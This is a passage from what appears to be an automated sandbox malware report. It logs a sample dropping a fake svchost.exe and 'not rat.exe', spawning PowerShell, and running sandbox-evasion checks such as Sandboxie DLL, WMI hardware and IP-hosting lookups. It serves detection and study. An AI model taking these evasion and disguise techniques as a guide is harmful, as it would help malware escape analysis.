                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe - Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exe - Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara match - File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match - File source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara match - File source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara match - File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match - File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match - File source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match - File source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara match - File source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara match - File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara match - File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Source: global traffic - HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 / Host: ip-api.com / Connection: Keep-Alive
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, not rat.exe.0.dr, svchost.exe.2.drBinary or memory string: SBIEDLL.DLLINFO
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeMemory allocated: 22ECA150000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeMemory allocated: 22EE3A40000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1490000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1490000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2930000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AA40000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1780000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 600000
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599875
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599766
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599628
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599500
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599391
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599281
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599162
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 599047
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598937
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598828
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598719
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598500
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598390
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598278
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598150
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 598036
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597802
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597532
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597404
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597294
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597187
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 597078
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596969
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596860
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596735
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596485
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596360
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596235
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 596110
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595985
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595863
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595735
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595610
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595485
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595360
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 595235
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594880
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594750
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594641
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594516
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594406
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594297
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594188
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 594063
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593938
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593813
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593703
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593594
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593469
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Thread delayed: delay time: 593359
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - Window / User API: threadDelayed 3433
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - Window / User API: threadDelayed 6410
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Window / User API: threadDelayed 5643
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe - Window / User API: threadDelayed 4158
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7218
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2503
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8034
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1432
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8368
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1151
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7146
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2404
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exe TID: 7336 - Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\not rat.exe TID: 7680 - Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -31359464925306218s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -600000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599875s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599766s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599628s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599500s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599391s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599281s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599162s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -599047s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598937s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598828s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598719s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598610s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598500s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598390s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598278s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598150s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -598036s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597802s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597532s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597404s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597294s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597187s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -597078s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596969s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596860s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596735s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596610s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596485s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596360s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596235s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -596110s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595985s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595863s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595735s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595610s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595485s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595360s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -595235s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594880s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594750s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594641s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594516s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594406s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594297s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594188s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -594063s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593938s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593813s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593703s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593594s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593469s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe TID: 7612 - Thread sleep time: -593359s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 - Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 - Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332 - Thread sleep count: 8368 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 - Thread sleep count: 1151 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 - Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736 - Thread sleep count: 7146 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1736 - Thread sleep count: 2404 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976 - Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4424 - Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7756 - Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8076 - Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\not rat.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Roaming\svchost.exe - File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exe - Thread delayed: delay time: 922337203685477
